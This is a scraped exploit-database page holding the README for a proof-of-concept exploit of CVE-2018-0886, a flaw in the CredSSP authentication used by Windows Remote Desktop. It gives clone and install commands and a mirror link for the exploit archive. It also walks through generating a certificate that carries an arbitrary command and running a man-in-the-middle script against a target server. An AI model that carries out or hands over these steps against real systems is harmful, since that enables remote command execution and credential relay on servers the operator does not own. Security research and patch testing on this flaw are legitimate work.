扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
# credssp This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only. It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay. Written by Eyal Karni, Preempt ekarni@preempt.com # Build ## Instructions (Linux) If you are using Ubuntu 14 , check the install file.. It was tested on Ubuntu 16.04. </code><code> $ git clone https://github.com/preempt/rdpy.git rdpy $ git clone https://github.com/preempt/credssp.git $ cd credssp/install $ sh install.sh $ cd ../../rdpy $ sudo python setup.py install </code><code> EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44453.zip * It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography). * A different version of openssl needed to be installed for this to run successfully.The install script does that. * Please follow the instructions in the described order. # Running the exploit Export a certificate suitable for Server Authentication from any domain. To generate a suitable certificate for the command to execute : </code><code> $ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD </code><code> (exploitc.pem ,exploitk.pem are the generated certificate and private key respectively) To run the attack script: </code><code> $ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer </code><code> More details are in the usage section of the scripts(--help). |
体验盒子
